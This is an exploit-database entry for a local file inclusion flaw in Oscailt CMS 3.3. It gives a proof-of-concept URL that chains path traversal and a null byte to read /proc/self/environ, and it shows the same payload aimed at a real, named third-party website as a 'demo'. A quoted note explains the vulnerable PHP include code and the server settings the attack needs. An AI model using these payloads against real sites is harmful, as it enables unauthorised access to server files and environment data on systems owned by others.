Oscailt CMS 3.3 Local File Inclusion

2009-10-28T00:00:00
ID 1337DAY-ID-9956
Type zdt
Reporter s4r4d0
Modified 2009-10-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================
Oscailt CMS 3.3 Local File Inclusion
====================================

[0] Oscailt 3.3 CMS
[0] Download: http://sourceforge.net/projects/oscailt/
[0] Bug: Local File Inclusion in index.php file !
[0] Poc: http://www.site.com/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] DEMO:http://imemc.org/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] Made in Brazil - SP
[0] Source Code:
# SecurityReason Note :
#
# The option "Use Friendly URL's" in configuration must be set off
#
# Vulnerable Code in index.php :
#
# $target_indyobject_id = getRequestTargetObjectID();
# ...
# if(!$use_live)
# {
#   $cachefile = getObjectCacheIndexFile($target_indyobject_id);
#   if(file_exists($cachefile))
#   {
#      include_once($cachefile);
#   }
#
# in function getObjectCacheIndexFile() we have ...
#
# function getObjectCacheIndexFile($id)
# {
#   $dir = getObjectCacheDir($id);
#   $f = $id.'.inc';
#   return $dir.$f;
# }
#
# As we can see , $cachefile try include inc file in cache dir.
#
# magic_quotes = Off // to use %00 null byte
#
# - sp3x
#



#  0day.today [2018-03-13]  #